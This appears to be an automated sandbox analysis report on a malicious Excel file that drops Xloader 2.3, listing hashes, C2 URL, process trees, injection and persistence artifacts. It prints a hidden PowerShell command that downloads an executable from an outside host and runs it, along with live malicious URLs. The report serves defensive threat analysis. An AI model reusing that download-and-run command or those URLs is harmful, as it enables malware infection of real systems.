Analysis
max time kernel: 148s
max time network: 145s
platform: windows7_x64
resource: win7v20210410
submitted: 20-04-2021 03:14
Static task: static1
Behavioral task: behavioral1
- Sample: W029621.xls
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: W029621.xls
- Resource: win10v20210410
General
- Target: W029621.xls
- Size: 342KB
- MD5: dcb68156748e6c71ef5df8d9dddb3ff6
- SHA1: ffee33ce2a6b4523a5f7323ca00a7347b1dc986a
- SHA256: 7da573f1004e4bb9c6979a6ccca45da8998deaa92dd1e318d128ff4888212536
- SHA512: eb24bd095799613417aaf3b0d8344af0cfce01d9700379e5e3ed7b8eff3f0d5abd3606866704a871aa0e2469b84ca24ce2416a590711329695ed0e700276186e
Malware Config
Extracted: xloader 2.3
- URL: http://www.preciousvessel.com/spj6/
Signatures
Xloader Payload 3 IoCs
Processes:
- behavioral1/memory/820-103-0x0000000000400000-0x0000000000428000-memory.dmp (yara_rule: xloader)
- behavioral1/memory/820-104-0x000000000041D010-mapping.dmp (yara_rule: xloader)
- behavioral1/memory/1768-114-0x0000000000080000-0x00000000000A8000-memory.dmp (yara_rule: xloader)
Blocklisted process makes network request 1 IoCs
Processes:
- flow 6, pid 748, process powershell.exe
Executes dropped EXE 2 IoCs
Processes:
- pid 2032, process issuepolitical.exe
- pid 820, process issuepolitical.exe
Loads dropped DLL 4 IoCs
Processes:
- pid 748, process powershell.exe (3 occurrences)
- pid 2032, process issuepolitical.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\notepa = "\"C:\\Users\\Admin\\AppData\\Local\\notepa.exe\"" (process issuepolitical.exe)
Drops file in System32 directory 5 IoCs
Processes:
- File created C:\Windows\SysWOW64\PerfStringBackup.TMP (OUTLOOK.EXE)
- File opened for modification C:\Windows\SysWOW64\PerfStringBackup.INI (OUTLOOK.EXE)
- File created C:\Windows\system32\perfc009.dat (OUTLOOK.EXE)
- File created C:\Windows\system32\perfh009.dat (OUTLOOK.EXE)
- File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
Suspicious use of SetThreadContext 3 IoCs
Processes:
- PID 2032 set thread context of 820: 2032 issuepolitical.exe -> issuepolitical.exe
- PID 820 set thread context of 1256: 820 issuepolitical.exe -> Explorer.EXE
- PID 1768 set thread context of 1256: 1768 NETSTAT.EXE -> Explorer.EXE
Drops file in Windows directory 3 IoCs
Processes:
- File created C:\Windows\inf\Outlook\outlperf.h (OUTLOOK.EXE)
- File opened for modification C:\Windows\inf\Outlook\outlperf.h (OUTLOOK.EXE)
- File created C:\Windows\inf\Outlook\0009\outlperf.ini (OUTLOOK.EXE)
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
- Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor (EXCEL.EXE)
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
- pid 1768, process NETSTAT.EXE
Modifies Internet Explorer settings
Processes:
- Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar (EXCEL.EXE)
- Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt (EXCEL.EXE)
- Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" (EXCEL.EXE)
- Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" (EXCEL.EXE)
- Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" (EXCEL.EXE)
- Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote (EXCEL.EXE)
- Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" (EXCEL.EXE)
- Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel (EXCEL.EXE)
- Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" (EXCEL.EXE)
Modifies registry class 64 IoCs
Processes: OUTLOOK.EXE (64 keys created or values set under \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
- pid 2004, process EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
- pid 748, process powershell.exe
- pid 2032, process issuepolitical.exe (2 occurrences)
- pid 820, process issuepolitical.exe (2 occurrences)
- pid 1768, process NETSTAT.EXE (15 occurrences)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- pid 1256, process Explorer.EXE
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
- pid 820, process issuepolitical.exe (3 occurrences)
- pid 1768, process NETSTAT.EXE (2 occurrences)
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
- Token: SeDebugPrivilege, pid 748, process powershell.exe
- Token: SeShutdownPrivilege, pid 1968, process OUTLOOK.EXE
- Token: SeDebugPrivilege, pid 2032, process issuepolitical.exe
- Token: SeDebugPrivilege, pid 820, process issuepolitical.exe
- Token: SeDebugPrivilege, pid 1768, process NETSTAT.EXE
- Token: SeShutdownPrivilege, pid 1256, process Explorer.EXE (4 occurrences)
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
- pid 1968, process OUTLOOK.EXE (6 occurrences)
- pid 1256, process Explorer.EXE (2 occurrences)
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
- pid 1968, process OUTLOOK.EXE (5 occurrences)
- pid 1256, process Explorer.EXE (2 occurrences)
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
- pid 2004, process EXCEL.EXE (3 occurrences)
- pid 1968, process OUTLOOK.EXE
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
- PID 1968 wrote to memory of 748: 1968 OUTLOOK.EXE -> powershell.exe (4 occurrences)
- PID 748 wrote to memory of 2032: 748 powershell.exe -> issuepolitical.exe (4 occurrences)
- PID 2032 wrote to memory of 820: 2032 issuepolitical.exe -> issuepolitical.exe (7 occurrences)
- PID 1256 wrote to memory of 1768: 1256 Explorer.EXE -> NETSTAT.EXE (4 occurrences)
- PID 1768 wrote to memory of 572: 1768 NETSTAT.EXE -> cmd.exe (4 occurrences)
Processes
- C:\Windows\Explorer.EXE (depth 1)
  Command line: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\W029621.xls
    - Enumerates system info in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
  - C:\Windows\SysWOW64\NETSTAT.EXE (depth 2)
    Command line: "C:\Windows\SysWOW64\NETSTAT.EXE"
    - Suspicious use of SetThreadContext
    - Gathers network information
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: /c del "C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe"
- C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: powershell -w Hidden Invoke-WebRequest -Uri "http://iklangratissurabaya.skom.id/zx/Fsbey.exe" -OutFile "C:\Users\Public\Documents\issuepolitical.exe";C:\Users\Public\Documents\issuepolitical.exe
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Public\Documents\issuepolitical.exe (depth 3)
      Command line: "C:\Users\Public\Documents\issuepolitical.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe (depth 4)
        Command line: C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- issuepolitical.exe (8 entries, all with identical hashes), observed at:
  - C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe
  - C:\Users\Public\Documents\issuepolitical.exe
  - \Users\Admin\AppData\Local\Temp\issuepolitical.exe
  - \Users\Public\Documents\issuepolitical.exe
  MD5: 8ab4c430e65defdd7b9975db28d3c92d
  SHA1: d509f417d02c31f4ebe3a7b22448af639d62568b
  SHA256: b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
  SHA512: 680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
- memory/572-112-0x0000000000000000-mapping.dmp
- memory/748-75-0x0000000005730000-0x0000000005731000-memory.dmp (Filesize 4KB)
- memory/748-68-0x00000000048E0000-0x00000000048E1000-memory.dmp (Filesize 4KB)
- memory/748-65-0x0000000000000000-mapping.dmp
- memory/748-80-0x0000000006140000-0x0000000006141000-memory.dmp (Filesize 4KB)
- memory/748-81-0x00000000062E0000-0x00000000062E1000-memory.dmp (Filesize 4KB)
- memory/748-88-0x00000000063E0000-0x00000000063E1000-memory.dmp (Filesize 4KB)
- memory/748-89-0x00000000064E0000-0x00000000064E1000-memory.dmp (Filesize 4KB)
- memory/748-90-0x000000007EF30000-0x000000007EF31000-memory.dmp (Filesize 4KB)
- memory/748-70-0x0000000002580000-0x00000000031CA000-memory.dmp (Filesize 12.3MB)
- memory/748-71-0x0000000002640000-0x0000000002641000-memory.dmp (Filesize 4KB)
- memory/748-69-0x0000000002580000-0x00000000031CA000-memory.dmp (Filesize 12.3MB)
- memory/748-66-0x00000000765F1000-0x00000000765F3000-memory.dmp (Filesize 8KB)
- memory/748-72-0x0000000002850000-0x0000000002851000-memory.dmp (Filesize 4KB)
- memory/748-67-0x0000000000A90000-0x0000000000A91000-memory.dmp (Filesize 4KB)
- memory/820-107-0x0000000000AD0000-0x0000000000DD3000-memory.dmp (Filesize 3.0MB)
- memory/820-108-0x0000000000260000-0x0000000000270000-memory.dmp (Filesize 64KB)
- memory/820-103-0x0000000000400000-0x0000000000428000-memory.dmp (Filesize 160KB)
- memory/820-104-0x000000000041D010-mapping.dmp
- memory/1256-118-0x00000000051A0000-0x000000000527C000-memory.dmp (Filesize 880KB)
- memory/1256-119-0x000007FEF63C0000-0x000007FEF6503000-memory.dmp (Filesize 1.3MB)
- memory/1256-109-0x00000000065F0000-0x0000000006757000-memory.dmp (Filesize 1.4MB)
- memory/1256-120-0x000007FE95DA0000-0x000007FE95DAA000-memory.dmp (Filesize 40KB)
- memory/1768-110-0x0000000000000000-mapping.dmp
- memory/1768-114-0x0000000000080000-0x00000000000A8000-memory.dmp (Filesize 160KB)
- memory/1768-116-0x0000000000500000-0x000000000058F000-memory.dmp (Filesize 572KB)
- memory/1768-113-0x00000000003A0000-0x00000000003A9000-memory.dmp (Filesize 36KB)
- memory/1768-115-0x0000000002220000-0x0000000002523000-memory.dmp (Filesize 3.0MB)
- memory/2004-62-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize 64KB)
- memory/2004-61-0x0000000071CC1000-0x0000000071CC3000-memory.dmp (Filesize 8KB)
- memory/2004-117-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize 64KB)
- memory/2004-60-0x000000002FF21000-0x000000002FF24000-memory.dmp (Filesize 12KB)
- memory/2032-101-0x0000000000A80000-0x0000000000A81000-memory.dmp (Filesize 4KB)
- memory/2032-99-0x0000000000260000-0x0000000000262000-memory.dmp (Filesize 8KB)
- memory/2032-100-0x0000000000530000-0x000000000056C000-memory.dmp (Filesize 240KB)
- memory/2032-97-0x0000000000F60000-0x0000000000F61000-memory.dmp (Filesize 4KB)
- memory/2032-93-0x0000000000000000-mapping.dmp